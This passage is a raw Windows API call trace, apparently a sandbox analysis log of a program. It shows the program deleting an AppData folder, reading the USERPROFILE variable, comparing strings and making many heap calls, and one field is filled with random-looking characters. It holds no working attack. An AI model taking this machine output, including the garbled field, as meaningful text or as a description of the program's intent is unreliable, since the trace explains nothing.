lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ") | out: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\AppData\\Local\\DBG", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ")) returned 0 [0157.563] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0157.563] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0157.563] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0157.563] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0157.563] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0157.563] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0157.563] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0157.563] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0157.563] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0157.564] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0157.564] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0157.564] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0157.564] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0157.564] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Google", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0157.564] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oogle", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0157.564] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0157.564] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0157.564] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0157.564] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0157.564] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0157.564] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0157.564] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0157.564] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0157.564] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0157.564] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0157.564] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0157.564] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0157.564] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0157.564] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0157.564] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0157.564] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0157.564] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0157.564] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0157.564] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0157.564] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0157.565] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0157.565] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0157.565] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0157.565] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0157.565] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0157.565] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0157.565] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0157.565] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xe) returned 0x2aaa5d0 [0157.565] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0157.565] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Google", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0157.565] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0157.565] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0157.565] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0157.565] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0157.565] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0157.565] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0157.565] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0157.565] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0157.565] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0157.565] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0157.565] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0157.565] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0157.565] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0157.565] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0157.565] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0157.565] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0157.565] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0157.565] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0157.565] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0157.565] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0157.566] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0157.566] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0157.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0157.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72648 [0157.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0157.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0157.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0157.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0157.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0157.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0157.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0157.566] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0157.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0157.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0157.566] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0157.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0157.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0157.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa600 [0157.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0157.566] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0157.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa558 [0157.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0157.566] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0157.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0157.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0157.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0157.566] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0157.566] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0157.566] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0157.566] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0157.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0157.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0157.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0157.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0157.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0157.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0157.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0157.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7060 [0157.567] RtlAllocateHeap 